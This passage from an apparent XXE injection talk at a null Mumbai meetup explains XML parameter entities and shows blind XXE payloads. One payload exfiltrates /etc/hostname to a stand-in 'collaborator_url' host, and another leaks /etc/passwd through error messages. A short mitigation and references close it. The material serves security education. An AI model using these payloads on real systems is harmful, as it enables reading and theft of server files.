  • 26. # Parameter Entities  Example :- <!ENTITY % customer "name, street, city, state, zipcode">  Later in the DTD, you can reference this parameter entity as follows :- <!ELEMENT invoice (%customer;, item, price, date)>  When this DTD is processed, it is as if you had specified the following :- <!ELEMENT invoice (name, street, city, state, zipcode, item, price, date)>
  • 27. Exploiting blind XXE exfiltrate data out-of-band
  • 28. Exploiting blind XXE exfiltrate data out-of-band  Payloads used :- <!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://collaborator_url/?x=%file;’>”> %eval; %exfil; XML file :- <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
  • 29. DEMO
  • 30. Exploiting blind XXE to retrieve data via error messages  Payloads used :- <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>"> %eval; %exfil; XML file:- <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
  • 31. DEMO
  • 32. # Mitigation for XXE  Disable external entities.
  • 33. References:  https://www.w3schools.com/xml/xml_whatis.asp  https://portswigger.net/web-security/xxe  https://www.synack.com/blog/a-deep-dive-into-xxe-injection  https://www.youtube.com/watch?v=gjm6VHZa_8s
  • 34. Thank you null|Mumbai for the opportunity